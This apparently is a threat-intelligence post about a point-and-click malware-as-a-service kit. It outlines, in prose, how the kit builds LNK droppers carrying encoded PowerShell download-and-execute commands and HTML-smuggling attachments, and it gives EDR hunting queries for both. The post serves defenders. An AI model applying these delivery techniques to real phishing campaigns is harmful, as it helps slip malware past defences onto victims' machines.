Malware-as-a-Service: New 'Point-and-Click' Kit Bypasses Security to Deliver Payloads via LNK and HTML    

Chapter 1: The Industrialization of Hacking — The Rise of "Point-and-Click" MaaS

The cybercrime ecosystem has undergone a dramatic professionalization. Sophisticated attack techniques are no longer the exclusive domain of elite state actors. They are now packaged, productized, and sold as a service. We are tracking a new Malware-as-a-Service (MaaS) platform, which we're calling **"EasySploit,"** that exemplifies this trend. It provides a simple, graphical "point-and-click" web interface that allows even low-skilled criminals to generate highly evasive dropper files in seconds. This democratization of advanced TTPs is dramatically increasing the volume and sophistication of threats that security teams face every day.

Chapter 2: Threat Analysis Part 1 — The Automated LNK Dropper Builder

The first module of the EasySploit platform automates the creation of malicious LNK files, a TTP used by a wide range of malware, including the **SORVEPOTEL worm**.

The Criminal's Workflow:

1. The criminal subscribes to the EasySploit service.
2. In the web UI, they simply paste the URL of their final payload (e.g., an infostealer hosted on a remote server).
3. They click "Generate LNK."
4. The EasySploit backend automatically generates a PowerShell one-liner to download and execute the payload, encodes it in Base64, and embeds it into the "Target" field of a Windows Shortcut (.LNK) file.
5. The criminal downloads the ready-to-use malicious LNK file and includes it in their phishing campaign.

Chapter 3: Threat Analysis Part 2 — The Automated HTML Smuggling Builder

The platform's more advanced module automates **HTML Smuggling**, a powerful technique for bypassing network security gateways.

The Criminal's Workflow:

1. The criminal uploads their malicious payload (e.g., a ZIP or ISO file containing a RAT) to the EasySploit platform.
2. They click "Generate HTML."
3. The backend service Base64-encodes the entire malicious file and embeds it inside a JavaScript "Blob" within a single HTML file.
4. The criminal downloads this HTML file. When the victim receives and opens this "harmless" `.html` attachment, the JavaScript inside it reconstructs the malicious ISO/ZIP file from the Blob and triggers a download in the user's browser, effectively "smuggling" it past the email gateway's file-type filters.

Chapter 4: The Defender's Playbook — Hunting for EasySploit's TTPs

Because these techniques abuse legitimate system features, detection must focus on the behavioral anomalies they create. This requires a modern **Endpoint Detection and Response (EDR)** solution.

Key Hunting Queries for Your SOC:

• To Detect the LNK Dropper:** Hunt for the parent-child relationship of the Windows shell launching PowerShell after a user clicks a shortcut.
  

  
      ParentProcess:explorer.exe AND ProcessName:powershell.exe AND (CommandLine CONTAINS "-EncodedCommand" OR CommandLine CONTAINS "IEX")
      

• To Detect HTML Smuggling:** Hunt for a browser process creating an unusually large file or a suspicious file type.
  

  
      Event_Type:FileCreation AND ProcessName IN ('chrome.exe', 'msedge.exe') AND FileExtension IN ('.iso', '.zip', '.img', '.vhd')